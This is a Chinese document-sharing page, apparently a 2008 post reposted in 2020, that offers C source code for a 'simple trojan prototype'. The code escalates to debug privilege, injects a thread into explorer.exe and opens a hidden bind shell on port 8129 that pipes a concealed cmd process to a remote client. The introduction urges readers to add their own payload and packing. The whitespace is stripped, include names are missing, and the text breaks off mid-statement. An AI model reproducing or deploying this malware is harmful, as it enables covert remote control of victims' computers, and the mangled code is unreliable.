病毒代码大全

￡琥￠yé￡
8 ℃
2020-05-10

整理文档很辛苦，赏杯茶钱您下走！

还剩 ... 页未读，继续阅读 >>

免费阅读已结束，点击下载阅读编辑剩下 ... 页

阅读已结束，您可以下载文档离线阅读编辑

资源描述

制造木马病毒代码大全2008-06-0819:46制造木马病毒代码大全一个简单的木马原型基础代码添加上自己的XXX，加上变态的壳，做点小修改，就可以．．．．．#include#pragmacomment(lib,ws2_32.lib)#include#include#pragmacomment(lib,Shlwapi.lib)#include#include#include//参数结构;typedefstruct_RemotePara{DWORDdwLoadLibrary;DWORDdwFreeLibrary;DWORDdwGetProcAddress;DWORDdwGetModuleHandle;DWORDdwWSAStartup;DWORDdwSocket;DWORDdwhtons;DWORDdwbind;DWORDdwlisten;DWORDdwaccept;DWORDdwsend;DWORDdwrecv;DWORDdwclosesocket;DWORDdwCreateProcessA;DWORDdwPeekNamedPipe;DWORDdwWriteFile;DWORDdwReadFile;DWORDdwCloseHandle;DWORDdwCreatePipe;DWORDdwTerminateProcess;DWORDdwMessageBox;charstrMessageBox[12];charwinsockDll[16];charcmd[10];charBuff[4096];chartelnetmsg[60];}RemotePara;//提升应用级调试权限BOOLEnablePrivilege(HANDLEhToken,LPCTSTRszPrivName,BOOLfEnable);//根据进程名称得到进程IDDWORDGetPidByName(char*szName);//远程线程执行体DWORD__stdcallThreadProc(RemotePara*Para){WSADATAWSAData;WORDnVersion;SOCKETlistenSocket;SOCKETclientSocket;structsockaddr_inserver_addr;structsockaddr_inclient_addr;intiAddrSize=sizeof(client_addr);SECURITY_ATTRIBUTESsa;HANDLEhReadPipe1;HANDLEhWritePipe1;HANDLEhReadPipe2;HANDLEhWritePipe2;STARTUPINFOsi;PROCESS_INFORMATIONProcessInformation;unsignedlonglBytesRead=0;typedefHINSTANCE(__stdcall*PLoadLibrary)(char*);typedefFARPROC(__stdcall*PGetProcAddress)(HMODULE,LPCSTR);typedefHINSTANCE(__stdcall*PFreeLibrary)(HINSTANCE);typedefHINSTANCE(__stdcall*PGetModuleHandle)(HMODULE);FARPROCPMessageBoxA;FARPROCPWSAStartup;FARPROCPSocket;FARPROCPhtons;FARPROCPbind;FARPROCPlisten;FARPROCPaccept;FARPROCPsend;FARPROCPrecv;FARPROCPclosesocket;FARPROCPCreateProcessA;FARPROCPPeekNamedPipe;FARPROCPWriteFile;FARPROCPReadFile;FARPROCPCloseHandle;FARPROCPCreatePipe;FARPROCPTerminateProcess;PLoadLibraryLoadLibraryFunc=(PLoadLibrary)Para-dwLoadLibrary;PGetProcAddressGetProcAddressFunc=(PGetProcAddress)Para-dwGetProcAddress;PFreeLibraryFreeLibraryFunc=(PFreeLibrary)Para-dwFreeLibrary;PGetModuleHandleGetModuleHandleFunc=(PGetModuleHandle)Para-dwGetModuleHandle;LoadLibraryFunc(Para-winsockDll);PWSAStartup=(FARPROC)Para-dwWSAStartup;PSocket=(FARPROC)Para-dwSocket;Phtons=(FARPROC)Para-dwhtons;Pbind=(FARPROC)Para-dwbind;Plisten=(FARPROC)Para-dwlisten;Paccept=(FARPROC)Para-dwaccept;Psend=(FARPROC)Para-dwsend;Precv=(FARPROC)Para-dwrecv;Pclosesocket=(FARPROC)Para-dwclosesocket;PCreateProcessA=(FARPROC)Para-dwCreateProcessA;PPeekNamedPipe=(FARPROC)Para-dwPeekNamedPipe;PWriteFile=(FARPROC)Para-dwWriteFile;PReadFile=(FARPROC)Para-dwReadFile;PCloseHandle=(FARPROC)Para-dwCloseHandle;PCreatePipe=(FARPROC)Para-dwCreatePipe;PTerminateProcess=(FARPROC)Para-dwTerminateProcess;PMessageBoxA=(FARPROC)Para-dwMessageBox;nVersion=MAKEWORD(2,1);PWSAStartup(nVersion,(LPWSADATA)&WSAData);listenSocket=PSocket(AF_INET,SOCK_STREAM,0);if(listenSocket==INVALID_SOCKET)return0;server_addr.sin_family=AF_INET;server_addr.sin_port=Phtons((unsignedshort)(8129));server_addr.sin_addr.s_addr=INADDR_ANY;if(Pbind(listenSocket,(structsockaddr*)&server_addr,sizeof(SOCKADDR_IN))!=0)return0;if(Plisten(listenSocket,5))return0;clientSocket=Paccept(listenSocket,(structsockaddr*)&client_addr,&iAddrSize);//Psend(clientSocket,Para-telnetmsg,60,0);if(!PCreatePipe(&hReadPipe1,&hWritePipe1,&sa,0))return0;if(!PCreatePipe(&hReadPipe2,&hWritePipe2,&sa,0))return0;ZeroMemory(&si,sizeof(si));//ZeroMemory是C运行库函数，可以直接调用si.dwFlags=STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;si.wShowWindow=SW_HIDE;si.hStdInput=hReadPipe2;si.hStdOutput=si.hStdError=hWritePipe1;if(!PCreateProcessA(NULL,Para-cmd,NULL,NULL,1,0,NULL,NULL,&si,&ProcessInformation))return0;while(1){memset(Para-Buff,0,4096);PPeekNamedPipe(hReadPipe1,Para-Buff,4096,&lBytesRead,0,0);if(lBytesRead){if(!PReadFile(hReadPipe1,Para-Buff,lBytesRead,&lBytesRead,0))break;if(!Psend(clientSocket,Para-Buff,lBytesRead,0))break;}else{lBytesRead=Precv(clientSocket,Para-Buff,4096,0);if(lBytesRead=0)break;if(!PWriteFile(hWritePipe2,Para-Buff,lBytesRead,&lBytesRead,0))break;}}PCloseHandle(hWritePipe2);PCloseHandle(hReadPipe1);PCloseHandle(hReadPipe2);PCloseHandle(hWritePipe1);Pclosesocket(listenSocket);Pclosesocket(clientSocket);//PMessageBoxA(NULL,Para-strMessageBox,Para-strMessageBox,MB_OK);return0;}intAPIENTRYWinMain(HINSTANCEhInstance,HINSTANCEhPrevInstance,LPSTRlpCmdLine,intnCmdShow){constDWORDTHREADSIZE=1024*4;DWORDbyte_write;void*pRemoteThread;HANDLEhToken,hRemoteProcess,hThread;HINSTANCEhKernel,hUser32,hSock;RemoteParamyRemotePara,*pRemotePara;DWORDpID;OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES,&hToken);EnablePrivilege(hToken,SE_DEBUG_NAME,TRUE);//获得指定进程句柄，并设其权限为PROCESS_ALL_ACCESSpID=GetPidByName(EXPLORER.EXE);if(pID==0)return0;hRemoteProcess=OpenProcess(PROCESS_ALL_ACCESS,FALSE,pID);if(!hRemoteProcess)return0;//在远程进程地址空间分配虚拟内存pRemoteThread=VirtualAllocEx(hRemoteProcess,0,THREADSIZE,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);if(!pRemoteThread)return0;//将线程执行体ThreadProc写入远程进程if(!WriteProcessMemory(hRemoteProcess,pRemoteThread,&ThreadProc,THREADSIZE,0))return0;ZeroMemory(&myRemotePara,sizeof(RemotePara